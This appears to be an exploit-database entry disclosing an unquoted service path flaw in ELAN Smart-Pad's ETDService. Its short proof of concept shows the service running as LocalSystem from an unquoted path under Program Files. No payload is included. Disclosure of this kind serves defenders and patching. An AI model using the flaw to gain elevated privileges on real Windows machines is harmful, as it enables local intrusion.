Elan smartpad 11.10.15.1 etdservice unquoted service path Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-02-06 |
Type : local |
Platform : windows
[+] Code ...
#Exploit Title: ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2020-02-05
#Vendor : ELAN Microelectronics
#Vendor Homepage : http://www.emc.com.tw/
#Tested on OS: Windows 10 v1803
#Analyze PoC :
==============
C:\Users\ZwX>sc qc ETDService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: ETDService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Elantech\ETDService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Elan Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem